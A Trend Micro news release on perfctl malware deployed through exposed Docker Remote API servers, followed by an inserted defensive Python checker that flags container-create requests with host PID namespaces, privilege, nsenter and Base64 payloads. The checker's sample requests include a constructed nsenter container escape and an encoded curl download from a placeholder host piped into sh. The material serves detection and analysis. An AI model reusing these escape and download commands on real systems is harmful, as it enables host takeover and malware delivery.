Trend Micro Inc.

10/21/2024 | News release | Distributed by Public on 10/21/2024 08:16

Attackers Target Exposed Docker Remote API Servers With perfctl Malware

Summary

  • Attackers exploit exposed Docker Remote API servers to deploy the perfctl malware through probing and payload execution.
  • The attack involves creating a Docker container with specific settings and executing a Base64 encoded payload.
  • Payload execution includes escaping the container, creating a bash script, setting environment variables, and downloading a malicious binary disguised as a PHP extension.
  • Attackers use evasion techniques to avoid detection, such as checking for processes with similar names before running, creating working directories, and defining a custom function to download files.
  • We provide a detailed breakdown of the attack sequence, shedding light on how threat actors leverage vulnerable Docker Remote API servers.

Recent cyberattacks have leveraged unprotected Docker Remote API servers to deploy malicious code. Attacks targeting the Docker Remote API server are structured, starting with probing for the server's presence and ending with the actual execution of payloads.

We will conduct a detailed analysis of the attack flow, describing how attackers exploit vulnerable Docker Remote API servers. By examining recent incidents, we will emphasize the importance of securing the Docker Remote API server and the potential consequences of this exploitation.

In a similar previous incident, an unknown threat actor installed a cryptocurrency miner using vulnerable Docker Remote API servers. The attacker set up a Docker container using the "ubuntu:mantic-20240405" image from Docker Hub, then used "nsenter" to break out of the container and run a Base64-encoded payload.
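One way a defender can screen container-create requests for the escape pattern described above (a container given the host's PID namespace and enough privilege to `nsenter` into PID 1, with a Base64-encoded payload on the command line) is shown below. This is an added example, not Trend Micro's code and not the incident's actual request bodies: the three sample requests, the image names other than "ubuntu:mantic-20240405", and the download URL are constructed. The field names `HostConfig.PidMode`, `HostConfig.Privileged` and `HostConfig.CapAdd` are real fields of the Docker Engine API's `POST /containers/create` body; the rule that `nsenter` into the host needs the host PID namespace plus either `Privileged` or the `SYS_ADMIN`/`SYS_PTRACE` capabilities is a heuristic assumption for this checker.

```python
import base64
import binascii
import re

# Capabilities that, together with the host PID namespace, let a process
# setns() into PID 1's namespaces (assumption used by this heuristic).
ESCAPE_CAPS = {"SYS_ADMIN", "SYS_PTRACE"}

# Base64 alphabet runs of at least 16 characters, optionally padded.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

# Constructed sample bodies in the shape of "POST /containers/create".
# They are illustrative, not captures from the incident described on the page.
_ENCODED = base64.b64encode(
    b"curl -s http://example.invalid/x.php.so -o /tmp/x; chmod +x /tmp/x"
).decode()
SAMPLE_REQUESTS = [
    # benign: ordinary web server, no host namespaces, no extra capabilities
    {"Image": "nginx:1.27", "Cmd": ["nginx", "-g", "daemon off;"],
     "HostConfig": {"Privileged": False}},
    # suspicious: privileged + host PID namespace + nsenter into PID 1 + base64 payload
    {"Image": "ubuntu:mantic-20240405",
     "Cmd": ["sh", "-c",
             "nsenter -t 1 -m -u -n -i sh -c 'echo " + _ENCODED + " | base64 -d | sh'"],
     "HostConfig": {"Privileged": True, "PidMode": "host"}},
    # suspicious: not privileged, but CapAdd grants what nsenter needs
    {"Image": "alpine:3.20", "Cmd": ["nsenter", "-t", "1", "-m", "sh"],
     "HostConfig": {"PidMode": "host", "CapAdd": ["CAP_SYS_ADMIN", "SYS_PTRACE"]}},
]


def _flatten(cmd):
    """Cmd/Entrypoint may be a string, a list, or absent; return one string."""
    if cmd is None:
        return ""
    if isinstance(cmd, str):
        return cmd
    return " ".join(cmd)


def find_base64_blobs(text):
    """Return decoded text for every base64-looking token that decodes to printable text."""
    decoded = []
    for tok in B64_TOKEN.findall(text):
        try:
            raw = base64.b64decode(tok, validate=True)
            s = raw.decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if s and all(ch.isprintable() or ch in "\n\t" for ch in s):
            decoded.append(s)
    return decoded


def assess_create_request(req):
    """Score one container-create body; return reasons and any decoded payloads."""
    host = req.get("HostConfig") or {}
    cmd = _flatten(req.get("Entrypoint")) + " " + _flatten(req.get("Cmd"))
    reasons = []

    host_pid = host.get("PidMode") == "host"
    if host_pid:
        reasons.append("host PID namespace (PidMode=host)")
    if host.get("Privileged"):
        reasons.append("privileged container")

    # Normalise "CAP_SYS_ADMIN" and "SYS_ADMIN" to the same spelling.
    caps = {c.upper().removeprefix("CAP_") for c in (host.get("CapAdd") or [])}
    dangerous_caps = caps & ESCAPE_CAPS
    if dangerous_caps:
        reasons.append("CapAdd grants " + ", ".join(sorted(dangerous_caps)))

    if "nsenter" in cmd:
        reasons.append("nsenter in command line")
    payloads = find_base64_blobs(cmd)
    if payloads:
        reasons.append("base64 payload in command line")

    escape_ready = host_pid and (bool(host.get("Privileged")) or bool(dangerous_caps))
    return {"image": req.get("Image"), "escape_ready": escape_ready,
            "reasons": reasons, "decoded_payloads": payloads}


def assess_all(requests=SAMPLE_REQUESTS):
    return [assess_create_request(r) for r in requests]


if __name__ == "__main__":
    for result in assess_all():
        flag = "ESCAPE-READY" if result["escape_ready"] else "ok"
        print(f"{result['image']}: {flag}; {'; '.join(result['reasons']) or 'no findings'}")
        for p in result["decoded_payloads"]:
            print("  decoded payload:", p)
```

In practice the request bodies would come from a reverse proxy or audit log in front of the daemon socket; the checker deliberately treats the host PID namespace as the pivot, because `nsenter -t 1` is useless without it, and decodes any Base64 argument so the downloaded-file path and URL are visible to the analyst rather than hidden behind `base64 -d | sh`.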

The Attack Sequence